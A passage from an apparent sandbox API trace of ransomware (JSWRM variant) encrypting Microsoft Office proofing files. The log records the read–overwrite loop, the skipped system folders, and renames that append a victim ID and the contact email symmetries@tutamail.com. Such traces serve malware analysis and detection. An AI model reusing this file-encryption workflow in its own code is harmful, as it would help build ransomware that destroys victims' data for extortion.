Office\\root\\Office16\\PROOF\\msth8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.794] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3461632) returned 1 [0139.794] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.794] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.808] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.808] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.808] CloseHandle (hObject=0x238) returned 1 [0139.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0139.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0139.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0139.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0139.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0139.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0139.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0139.809] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8en.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8EN.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8en.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0139.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0139.810] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf03d07a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb29c380, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x63ac8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8ES.DLL", cAlternateFileName="")) returned 1 [0139.810] lstrcmpiW (lpString1="msth8ES.DLL", lpString2=".") returned 1 [0139.810] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="..") returned 1 [0139.810] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="...") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="windows") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="recovery") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="perflogs") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="documents and settings") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="system volume information") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.DLL", lpString2="msocache") returned 1 [0139.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8ES.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0139.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8ES.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0139.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0139.811] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4cd4a32, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cd4a32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb8b847f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40b800, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8ES.LEX", cAlternateFileName="")) returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2=".") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="..") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="...") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="windows") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="recovery") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="perflogs") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="documents and settings") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="system volume information") returned -1 [0139.811] lstrcmpiW (lpString1="msth8ES.LEX", lpString2="msocache") returned 1 [0139.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0139.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8ES.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0139.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0139.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0139.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0139.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.813] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4241408) returned 1 [0139.814] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.814] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.827] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.827] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.827] CloseHandle (hObject=0x238) returned 1 [0139.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0139.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0139.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0139.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0139.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0139.828] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8es.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8ES.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8es.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0139.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0139.829] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf43e3cb7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5972d3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64068, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8FR.DLL", cAlternateFileName="")) returned 1 [0139.829] lstrcmpiW (lpString1="msth8FR.DLL", lpString2=".") returned 1 [0139.829] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="..") returned 1 [0139.829] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="...") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="windows") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="recovery") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="perflogs") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="documents and settings") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="system volume information") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.DLL", lpString2="msocache") returned 1 [0139.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8FR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0139.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8FR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0139.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0139.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0139.830] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13e86a9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13e86a9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5972d3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x54a000, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8FR.LEX", cAlternateFileName="")) returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2=".") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="..") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="...") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="windows") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="recovery") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="perflogs") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="documents and settings") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="system volume information") returned -1 [0139.830] lstrcmpiW (lpString1="msth8FR.LEX", lpString2="msocache") returned 1 [0139.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8FR.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0139.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0139.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0139.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.832] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5545984) returned 1 [0139.832] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.832] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.845] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.845] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.845] CloseHandle (hObject=0x238) returned 1 [0139.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0139.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0139.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0139.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0139.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0139.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.846] MoveFileW 